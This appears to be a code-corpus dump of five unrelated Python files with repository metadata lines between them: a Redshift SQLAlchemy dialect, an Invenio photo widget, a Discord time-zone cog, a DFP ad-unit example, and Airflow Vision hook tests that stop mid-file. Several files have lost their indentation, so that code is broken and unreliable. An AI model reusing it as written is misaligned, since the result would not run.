n.oid as "schema_oid",
c.oid as "table_oid"
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace
JOIN pg_catalog.pg_table_def d
ON (d.schemaname, d.tablename) = (n.nspname, c.relname)
JOIN pg_catalog.pg_attribute att
ON (att.attrelid, att.attname) = (c.oid, d.column)
LEFT JOIN pg_catalog.pg_attrdef ad
ON (att.attrelid, att.attnum) = (ad.adrelid, ad.adnum)
WHERE n.nspname !~ '^pg_' AND pg_catalog.pg_table_is_visible(c.oid)
ORDER BY n.nspname, c.relname
""")
all_columns = defaultdict(list)
for col in result:
schema = col.schema
if schema == inspect(connection).default_schema_name:
schema = None
key = _get_relation_key(col.table_name, schema)
all_columns[key].append(col)
self._all_columns = all_columns
return self._all_columns
@reflection.cache
def _get_all_constraint_info(self, connection, **kw):
result = connection.execute("""
SELECT
n.nspname as "schema",
c.relname as "table_name",
t.contype,
t.conname,
t.conkey,
a.attnum,
a.attname,
pg_catalog.pg_get_constraintdef(t.oid, true) as condef,
n.oid as "schema_oid",
c.oid as "rel_oid"
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace
JOIN pg_catalog.pg_constraint t
ON t.conrelid = c.oid
JOIN pg_catalog.pg_attribute a
ON t.conrelid = a.attrelid AND a.attnum = ANY(t.conkey)
WHERE n.nspname !~ '^pg_' AND pg_catalog.pg_table_is_visible(c.oid)
ORDER BY n.nspname, c.relname
""")
all_constraints = defaultdict(list)
for con in result:
schema = con.schema
if schema == inspect(connection).default_schema_name:
schema = None
key = _get_relation_key(con.table_name, schema)
all_constraints[key].append(con)
self._all_constraints = all_constraints
return self._all_constraints
class UnloadFromSelect(Executable, ClauseElement):
    ''' Prepares a Redshift UNLOAD statement that writes the result of a
    query to Amazon S3.
    http://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD_command_examples.html
    '''
    def __init__(self, select, unload_location, access_key, secret_key, session_token='', options=None):
        ''' Initializes an UnloadFromSelect instance
        Args:
            self: An instance of UnloadFromSelect
            select: The select statement to be unloaded
            unload_location: The Amazon S3 bucket where the result will be stored
            access_key: AWS Access Key (required)
            secret_key: AWS Secret Key (required)
            session_token: AWS STS Session Token (optional)
            options: Dict of optional parameters to modify the UNLOAD sql:
                parallel: If 'ON' the result will be written to multiple files.
                    If 'OFF' the result will be written to one (1) file of up
                    to 6.2GB before splitting
                add_quotes: Boolean value for ADDQUOTES; defaults to True
                null_as: Optional string that represents a null value in the
                    unload output
                delimiter: File delimiter; defaults to ','
        '''
self.select = select
self.unload_location = unload_location
self.access_key = access_key
self.secret_key = secret_key
self.session_token = session_token
        self.options = options or {}
@compiles(UnloadFromSelect)
def visit_unload_from_select(element, compiler, **kw):
''' Returns the actual sql query for the UnloadFromSelect class
'''
return """
UNLOAD ('%(query)s') TO '%(unload_location)s'
CREDENTIALS 'aws_access_key_id=%(access_key)s;aws_secret_access_key=%(secret_key)s%(session_token)s'
DELIMITER '%(delimiter)s'
%(add_quotes)s
%(null_as)s
ALLOWOVERWRITE
PARALLEL %(parallel)s;
""" % \
{'query': compiler.process(element.select, unload_select=True, literal_binds=True),
'unload_location': element.unload_location,
'access_key': element.access_key,
'secret_key': element.secret_key,
'session_token': ';token=%s' % element.session_token if element.session_token else '',
'add_quotes': 'ADDQUOTES' if bool(element.options.get('add_quotes', True)) else '',
'null_as': ("NULL '%s'" % element.options.get('null_as')) if element.options.get('null_as') else '',
'delimiter': element.options.get('delimiter', ','),
'parallel': element.options.get('parallel', 'ON')}
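# Illustrative usage sketch (not part of the original module; the ``users``
# table, bucket and key material below are placeholders):
#
#     unload = UnloadFromSelect(
#         sa.select([users.c.id, users.c.email]),
#         's3://my-bucket/unload/users_',
#         access_key='A' * 20,
#         secret_key='b' * 40,
#         options={'delimiter': '|', 'null_as': 'NULL'},
#     )
#     connection.execute(unload)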
# At the time of this implementation, no specification for a session token was
# found. After looking at a few session tokens they appear to be the same as
# the aws_secret_access_key pattern, but much longer. An example token can be
# found here: http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
# The regexes for access keys can be found here: http://blogs.aws.amazon.com/security/blog/tag/key+rotation
creds_rx = re.compile(r"""
^aws_access_key_id=[A-Z0-9]{20};
aws_secret_access_key=[A-Za-z0-9/+=]{40}
(?:;token=[A-Za-z0-9/+=]+)?$
""", re.VERBOSE)
class CopyCommand(Executable, ClauseElement):
"""
Prepares a Redshift COPY statement.
Parameters
----------
table : sqlalchemy.Table
The table to copy data into
data_location : str
The Amazon S3 location from where to copy, or a manifest file if
the `manifest` option is used
access_key : str
secret_key : str
session_token : str, optional
    delimiter : str, optional
        File delimiter; defaults to ','
ignore_header : int, optional
Integer value of number of lines to skip at the start of each file
dangerous_null_delimiter : str, optional
Optional string value denoting what to interpret as a NULL value from
the file. Note that this parameter *is not properly quoted* due to a
difference between redshift's and postgres's COPY commands
interpretation of strings. For example, null bytes must be passed to
redshift's ``NULL`` verbatim as ``'\\0'`` whereas postgres's ``NULL``
accepts ``'\\x00'``.
manifest : bool, optional
Boolean value denoting whether data_location is a manifest file.
empty_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with empty
values as NULL instead of empty string
blanks_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with whitespace
only values as NULL instead of whitespace
format : str, optional
CSV, JSON, or AVRO. Indicates the type of file to copy from.
compression : str, optional
        GZIP or LZOP; indicates the compression type of the file to copy
"""
formats = ['CSV', 'JSON', 'AVRO']
compression_types = ['GZIP', 'LZOP']
def __init__(self, table, data_location, access_key_id, secret_access_key,
session_token=None, delimiter=',', ignore_header=0,
dangerous_null_delimiter=None, manifest=False,
empty_as_null=True,
blanks_as_null=True, format='CSV', compression=None):
credentials = 'aws_access_key_id={0};aws_secret_access_key={1}'.format(
access_key_id,
secret_access_key
)
if session_token is not None:
credentials += ';token={0}'.format(session_token)
if not creds_rx.match(credentials):
raise ValueError('credentials must match the following'
' format:\n'
'aws_access_key_id=<access-key-id>;'
'aws_secret_access_key=<secret-access-key>'
'[;token=<temporary-session-token>]\ngot %r' %
credentials)
if len(delimiter) != 1:
raise ValueError('"delimiter" parameter must be a single '
'character')
if not isinstance(ignore_header, numbers.Integral):
raise TypeError('"ignore_header" parameter should be an integer')
if format not in self.formats:
raise ValueError('"format" parameter must be one of %s' %
self.formats)
if compression is not None and compression not in self.compression_types:
raise ValueError('"compression" parameter must be one of %s' %
self.compression_types)
self.table = table
self.data_location = data_location
self.credentials = credentials
self.delimiter = delimiter
self.ignore_header = ignore_header
self.dangerous_null_delimiter = dangerous_null_delimiter
self.manifest = manifest
self.empty_as_null = empty_as_null
self.blanks_as_null = blanks_as_null
self.format = format
self.compression = compression or ''
def _tablename(t, compiler):
name = compiler.preparer.quote(t.name)
if t.schema is not None:
return '%s.%s' % (compiler.preparer.quote_schema(t.schema), name)
else:
return name
@compiles(CopyCommand)
def visit_copy_command(element, compiler, **kw):
''' Returns the actual sql query for the CopyCommand class
'''
qs = """COPY {table} FROM :data_location
CREDENTIALS :credentials
{format}
TRUNCATECOLUMNS
DELIMITER :delimiter
IGNOREHEADER :ignore_header
{null}
{manifest}
{compression}
{empty_as_null}
{blanks_as_null}
""".format(table=_tablename(element.table, compiler),
format=element.format,
manifest='MANIFEST' if element.manifest else '',
compression=element.compression,
empty_as_null='EMPTYASNULL' if element.empty_as_null else '',
blanks_as_null='BLANKSASNULL' if element.blanks_as_null else '',
ignore_header=element.ignore_header,
null=(("NULL '%s'" % element.dangerous_null_delimiter)
if element.dangerous_null_delimiter is not None else ''))
return compiler.process(
sa.text(qs).bindparams(
sa.bindparam('data_location',
value=element.data_location,
type_=sa.String),
sa.bindparam('credentials', value=element.credentials,
type_=sa.String),
sa.bindparam('delimiter',
value=element.delimiter,
type_=sa.String),
sa.bindparam('ignore_header',
value=element.ignore_header,
type_=sa.Integer)
),
**kw
)
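# Illustrative usage sketch (hypothetical table and placeholder credentials):
#
#     copy = CopyCommand(
#         users_table,                          # a sqlalchemy.Table
#         's3://my-bucket/data/users.csv.gz',
#         access_key_id='A' * 20,
#         secret_access_key='b' * 40,
#         ignore_header=1,
#         compression='GZIP',
#     )
#     connection.execute(copy)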
@compiles(BindParameter)
def visit_bindparam(bindparam, compiler, **kw):
    res = compiler.visit_bindparam(bindparam, **kw)
    if 'unload_select' in kw:
        # Escape the rendered parameter so it survives embedding in the
        # single-quoted UNLOAD query string.
        res = res.replace("'", "\\'")
        res = res.replace('%', '%%')
    return res
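# Escaping example (illustrative): with unload_select set, a rendered literal
# like O'Hara 100% becomes O\'Hara 100%% so it survives both the outer
# single-quoted UNLOAD string and DB-API paramstyle expansion.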
|
bouk/redshift_sqlalchemy
|
redshift_sqlalchemy/dialect.py
|
Python
|
mit
| 34,694 | 0.000461 |
# -*- coding: utf-8 -*-
##
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebJournal widget - display photos from given collections
"""
from invenio.bibformat_engine import BibFormatObject
from invenio.search_engine import perform_request_search
from invenio.config import CFG_CERN_SITE, CFG_SITE_URL
def format(bfo, collections, max_photos="3", separator="<br/>"):
"""
Display the latest pictures from the given collection(s)
    @param collections: comma-separated list of collections from which photos have to be fetched
@param max_photos: maximum number of photos to display
@param separator: separator between photos
"""
    try:
        int_max_photos = int(max_photos)
    except (TypeError, ValueError):
        int_max_photos = 0
    try:
        collections_list = [coll.strip() for coll in collections.split(',')]
    except AttributeError:
        collections_list = []
out = get_widget_html(bfo.lang, int_max_photos,
collections_list, separator, bfo.lang)
return out
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
def get_widget_html(language, max_photos, collections, separator, ln):
"""
Returns the content of the widget
"""
latest_photo_ids = perform_request_search(c=collections,
rg=max_photos,
of='id')
images_urls = []
for recid in latest_photo_ids[:max_photos]:
try:
photo_record = BibFormatObject(recid)
        except Exception:
# todo: Exception, no photo in this selection
continue
if language == "fr":
try:
title = photo_record.fields('246_1a', escape=1)[0]
            except (IndexError, KeyError):
title = ""
else:
try:
title = photo_record.fields('245__a', escape=1)[0]
            except (IndexError, KeyError):
# todo: exception, picture with no title
title = ""
if CFG_CERN_SITE and photo_record.fields('8567_'):
# Get from 8567_
dfs_images = photo_record.fields('8567_')
for image_block in dfs_images:
if image_block.get("y", '') == "Icon":
if image_block.get("u", '').startswith("http://"):
images_urls.append((recid, image_block["u"], title))
break # Just one image per record
else:
# Get from 8564_
images = photo_record.fields('8564_')
for image_block in images:
if image_block.get("x", '').lower() == "icon":
if image_block.get("q", '').startswith("http://"):
images_urls.append((recid, image_block["q"], title))
break # Just one image per record
# Build output
html_out = separator.join(['<a href="%s/record/%i?ln=%s"><img class="phr" width="100" height="67" src="%s"/>%s</a>' % (CFG_SITE_URL, recid, ln, photo_url, title) for (recid, photo_url, title) in images_urls])
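    # Illustrative value of html_out for one photo (all values made up):
    #     <a href="http://example.org/record/123?ln=en"><img class="phr"
    #     width="100" height="67" src="http://example.org/icon.jpg"/>A title</a>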
return html_out
|
ppiotr/Bibedit-some-refactoring
|
modules/webjournal/lib/widgets/bfe_webjournal_widget_latestPhoto.py
|
Python
|
gpl-2.0
| 3,928 | 0.005855 |
import asyncio
import discord
import datetime
import pytz
from discord.ext import commands
from Cogs import FuzzySearch
from Cogs import Settings
from Cogs import DisplayName
from Cogs import Message
from Cogs import Nullify
class Time:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
@commands.command(pass_context=True)
async def settz(self, ctx, *, tz : str = None):
"""Sets your TimeZone - Overrides your UTC offset - and accounts for DST."""
usage = 'Usage: `{}settz [Region/City]`\nYou can get a list of available TimeZones with `{}listtz`'.format(ctx.prefix, ctx.prefix)
if not tz:
self.settings.setGlobalUserStat(ctx.author, "TimeZone", None)
await ctx.channel.send("*{}*, your TimeZone has been removed!".format(DisplayName.name(ctx.author)))
return
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
if not tz_list[0]['Ratio'] == 1:
# We didn't find a complete match
msg = "I couldn't find that TimeZone!\n\nMaybe you meant one of the following?\n```"
for tz in tz_list:
msg += tz['Item'] + "\n"
msg += '```'
await ctx.channel.send(msg)
return
# We got a time zone
self.settings.setGlobalUserStat(ctx.author, "TimeZone", tz_list[0]['Item'])
await ctx.channel.send("TimeZone set to *{}!*".format(tz_list[0]['Item']))
@commands.command(pass_context=True)
async def listtz(self, ctx, *, tz_search = None):
"""List all the supported TimeZones in PM."""
if not tz_search:
msg = "__Available TimeZones:__\n\n"
for tz in pytz.all_timezones:
msg += tz + "\n"
else:
tz_list = FuzzySearch.search(tz_search, pytz.all_timezones)
msg = "__Top 3 TimeZone Matches:__\n\n"
for tz in tz_list:
msg += tz['Item'] + "\n"
await Message.say(self.bot, msg, ctx.channel, ctx.author, 1)
@commands.command(pass_context=True)
async def tz(self, ctx, *, member = None):
"""See a member's TimeZone."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
timezone = self.settings.getGlobalUserStat(member, "TimeZone")
if timezone == None:
msg = '*{}* hasn\'t set their TimeZone yet - they can do so with the `{}settz [Region/City]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
msg = '*{}\'s* TimeZone is *{}*'.format(DisplayName.name(member), timezone)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def setoffset(self, ctx, *, offset : str = None):
"""Set your UTC offset."""
if offset == None:
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", None)
msg = '*{}*, your UTC offset has been removed!'.format(DisplayName.name(ctx.message.author))
await ctx.channel.send(msg)
return
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
off = "{}:{}".format(hours, minutes)
self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", off)
msg = '*{}*, your UTC offset has been set to *{}!*'.format(DisplayName.name(ctx.message.author), off)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def offset(self, ctx, *, member = None):
"""See a member's UTC offset."""
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
if member == None:
member = ctx.message.author
if type(member) == str:
# Try to get a user first
memberName = member
member = DisplayName.memberForName(memberName, ctx.message.guild)
if not member:
msg = 'Couldn\'t find user *{}*.'.format(memberName)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
return
# We got one
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their offset yet - they can do so with the `{}setoffset [+-offset]` command.'.format(DisplayName.name(member), ctx.prefix)
await ctx.channel.send(msg)
return
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
await ctx.channel.send('Offset has to be in +-H:M!')
return
msg = 'UTC'
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
msg = '*{}\'s* offset is *{}*'.format(DisplayName.name(member), msg)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def time(self, ctx, *, offset : str = None):
"""Get UTC time +- an offset."""
timezone = None
if offset == None:
member = ctx.message.author
else:
# Try to get a user first
member = DisplayName.memberForName(offset, ctx.message.guild)
if member:
# We got one
# Check for timezone first
offset = self.settings.getGlobalUserStat(member, "TimeZone")
if offset == None:
offset = self.settings.getGlobalUserStat(member, "UTCOffset")
if offset == None:
msg = '*{}* hasn\'t set their TimeZone or offset yet - they can do so with the `{}setoffset [+-offset]` or `{}settz [Region/City]` command.\nThe current UTC time is *{}*.'.format(DisplayName.name(member), ctx.prefix, ctx.prefix, datetime.datetime.utcnow().strftime("%I:%M %p"))
await ctx.channel.send(msg)
return
# At this point - we need to determine if we have an offset - or possibly a timezone passed
t = self.getTimeFromTZ(offset)
if t == None:
# We did not get an offset
t = self.getTimeFromOffset(offset)
if t == None:
await ctx.channel.send("I couldn't find that TimeZone or offset!")
return
if member:
msg = '{}; where *{}* is, it\'s currently *{}*'.format(t["zone"], DisplayName.name(member), t["time"])
else:
msg = '{} is currently *{}*'.format(t["zone"], t["time"])
# Say message
await ctx.channel.send(msg)
def getTimeFromOffset(self, offset):
offset = offset.replace('+', '')
# Split time string by : and get hour/minute values
try:
hours, minutes = map(int, offset.split(':'))
except Exception:
try:
hours = int(offset)
minutes = 0
except Exception:
return None
msg = 'UTC'
# Get the time
t = datetime.datetime.utcnow()
# Apply offset
if hours > 0:
# Apply positive offset
msg += '+{}'.format(offset)
td = datetime.timedelta(hours=hours, minutes=minutes)
newTime = t + td
elif hours < 0:
# Apply negative offset
msg += '{}'.format(offset)
td = datetime.timedelta(hours=(-1*hours), minutes=(-1*minutes))
newTime = t - td
else:
# No offset
newTime = t
return { "zone" : msg, "time" : newTime.strftime("%I:%M %p") }
def getTimeFromTZ(self, tz):
# Assume sanitized zones - as they're pulled from pytz
# Let's get the timezone list
tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
if not tz_list[0]['Ratio'] == 1:
# We didn't find a complete match
return None
zone = pytz.timezone(tz_list[0]['Item'])
zone_now = datetime.datetime.now(zone)
return { "zone" : tz_list[0]['Item'], "time" : zone_now.strftime("%I:%M %p") }
|
TheMasterGhost/CorpBot
|
Cogs/Time.py
|
Python
|
mit
| 8,457 | 0.03299 |
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code gets the ad unit hierarchy and displays it as a tree.
To create ad units, run create_ad_units.py
Tags: InventoryService.getAdUnit
Tags: NetworkService.getCurrentNetwork
"""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
def main(client):
# Initialize appropriate service.
inventory_service = client.GetService('InventoryService', version='v201302')
# Get ad units by statement.
all_ad_units = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service)
# Find the root ad unit. root_ad_unit can also be set to child unit to only
# build and display a portion of the tree.
# i.e. root_ad_unit = inventory_service.GetAdUnit('INSERT_AD_UNIT_HERE')[0]
response = DfpUtils.GetAllEntitiesByStatementWithService(
inventory_service, query='WHERE parentId IS NULL')
root_ad_unit = {}
if response:
root_ad_unit = response[0]
if root_ad_unit:
    BuildAndDisplayAdUnitTree(root_ad_unit, all_ad_units)
else:
print 'Could not build tree. No root ad unit found.'
def DisplayAdUnitTree(root_ad_unit, ad_unit_tree, depth=0):
"""Helper for displaying ad unit tree.
Args:
root_ad_unit: dict the root ad unit.
ad_unit_tree: dict the tree of ad units.
[optional]
depth: int the depth the tree has reached.
"""
print '%s%s (%s)' % (GenerateTab(depth), root_ad_unit['name'],
root_ad_unit['id'])
if root_ad_unit['id'] in ad_unit_tree:
for child in ad_unit_tree[root_ad_unit['id']]:
DisplayAdUnitTree(child, ad_unit_tree, depth+1)
def GenerateTab(depth):
"""Generate tabs to represent branching to children.
Args:
depth: int the depth the tree has reached.
Returns:
string inserted in front of the root unit.
"""
tab_list = []
if depth > 0:
tab_list.append(' ')
tab_list.append('| ' * depth)
tab_list.append('+--')
return ''.join(tab_list)
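# Illustrative output (ids made up): GenerateTab(1) returns ' | +--', so a
# printed hierarchy looks like:
#     +--Root ad unit (1)
#      | +--Child (2)
#      | | +--Grandchild (3)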
def BuildAndDisplayAdUnitTree(root_ad_unit, all_ad_units):
"""Create an ad unit tree and display it.
Args:
root_ad_unit: dict the root ad unit to build the tree under.
all_ad_units: list the list of all ad units to build the tree with.
"""
tree = {}
for ad_unit in all_ad_units:
if 'parentId' in ad_unit:
if ad_unit['parentId'] not in tree:
tree[ad_unit['parentId']] = []
tree[ad_unit['parentId']].append(ad_unit)
DisplayAdUnitTree(root_ad_unit, tree)
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client)
|
donspaulding/adspygoogle
|
examples/adspygoogle/dfp/v201302/inventory_service/get_ad_unit_hierarchy.py
|
Python
|
apache-2.0
| 3,490 | 0.010029 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
AnnotateImageResponse,
EntityAnnotation,
SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
]
REFERENCE_IMAGE_NAME_TEST = (
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}
class TestGcpVisionHook(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudVisionHook(gcp_conn_id='test')
@mock.patch(
"airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
new_callable=mock.PropertyMock,
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
)
assert mock_client.return_value == result
assert self.hook._client == result
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_explicit_id(self, get_conn):
# Given
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# ProductSet ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCTSET_ID_TEST
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=PRODUCTSET_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-id'
response_product_set = ProductSet(
name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
)
# Then
# ProductSet ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product_set = None
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=None,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_get_productset(self, get_conn):
# Given
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
response_product_set = ProductSet(name=name)
get_product_set_method = get_conn.return_value.get_product_set
get_product_set_method.return_value = response_product_set
# When
response = self.hook.get_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response
assert response == MessageToDict(response_product_set)
get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name(self, get_conn):
# Given
product_set = ProductSet()
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
productset_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
result = self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=productset_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
